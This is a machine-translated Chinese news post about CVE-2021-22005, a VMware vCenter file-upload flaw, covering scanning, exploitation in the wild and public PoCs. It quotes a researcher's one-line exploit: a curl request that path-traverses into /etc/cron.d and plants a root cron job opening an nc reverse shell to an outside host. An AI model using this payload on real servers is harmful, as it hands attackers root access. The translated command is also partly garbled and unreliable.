记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

VMware vCenter 中 CVE-2021-22005 的完整 PoC 漏洞可在线获得

2021-09-29 17:36

VMware vCenter 中CVE-2021-22005漏洞的工作漏洞已公开提供,攻击者已经尝试在使用它。

VMware 最近处理了关键任意文件上传漏洞 CVE-2021-22005,它影响运行默认 vCenter 服务器 6.7 和 7.0 部署的设备。

vCenter 服务器是 VMware 的集中管理实用程序,用于管理虚拟计算机、多个 ESXi 主机以及来自单个集中位置的所有受抚养组件。

漏洞是由于它处理会话令牌的方式。

"VMware 发布了针对新的关键安全咨询 VMSA-2021-0020 的补丁。如果您使用 vCenter服务器,这需要您立即关注。"VMSA 概述了在此修补程序版本中解决的一些问题。最紧迫的地址 CVE-2021-22005,一个文件上传漏洞,可用于在 vCenter 服务器设备上执行命令和软件。此漏洞可用于任何可以通过网络访问 vCenter 服务器以获取访问权限的任何人,无论 vCenter 服务器的配置设置如何。

虽然该公司敦促其客户立即应用安全修补程序来修复漏洞,但威胁参与者开始在互联网上扫描易受攻击的系统。

威胁情报公司Bad Packets报告说,在虚拟化巨头解决这一缺陷后,立即开始对此漏洞进行扫描活动。



CVE-2021-22005 扫描活动检测从 116.48.233.234() 。目标:VMware

vCenter 服务器容易受到任意文件上传导致远程代码执行(https://t.co/JWfc7rHuUK) 的影响。

#threatintel pic.twitter.com/mDFQtyx8IG

• 坏包(@bad_packets) 2021 年 9 月 22 日



Bleeping计算机的研究人员还报告说,威胁行为者已经开始利用安全研究员张发布的代码利用CVE-2021-22005。

VMware证实,它知道威胁行为者利用在野外的缺陷。

"VMSA 概述了在此修补程序版本中解决的一些问题。最紧迫的地址 CVE-2021-22005,一个文件上传漏洞,可用于在 vCenter 服务器设备上执行命令和软件。此漏洞可用于任何可以通过网络访问 vCenter 服务器以获取访问权限的任何人,无论 vCenter 服务器的配置设置如何。阅读Vmware 发布的帖子。

现在,一个针对该漏洞的不同漏洞代码正在在线流传,它允许远程攻击者在易受攻击的系统上打开反向外壳并执行任意代码。

研究人员wvu发布了 CVE-2021-22005 的未编辑 PoC 漏洞,该漏洞与启用客户体验改进计划 (CEIP) 组件(默认配置)的系统相抗效。



CVE-2021-22005:野外开发得到证实。未编辑的 Rce Poc 对下面的 Ceip 。

卷曲 - kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/。

/../../../../../etc/cron.d/$RANDOM" -H 内容类型: -d * * * 根 nc - e /bin/sh 172.16.57.1 4444" https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA

• wvu (@wvuuuuuuuuuuuuu) 2021 年 9 月 27 日

需要说明的是,只有启用 CEIP(这是一个 "选择退出" 功能)时,这些特定端点才能被利用。

• wvu (@wvuuuuuuuuuuuuu) 2021 年 9 月 24 日



专家毫不怀疑,漏洞的可用性将导致针对易受此漏洞攻击的系统的攻击数量激增。


知识来源: https://www.wangan.com/p/7fygfg909e8811f9

阅读:83375 | 评论:0 | 标签:漏洞 CVE

想收藏或者和大家分享这篇好文章→复制链接地址

“VMware vCenter 中 CVE-2021-22005 的完整 PoC 漏洞可在线获得”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁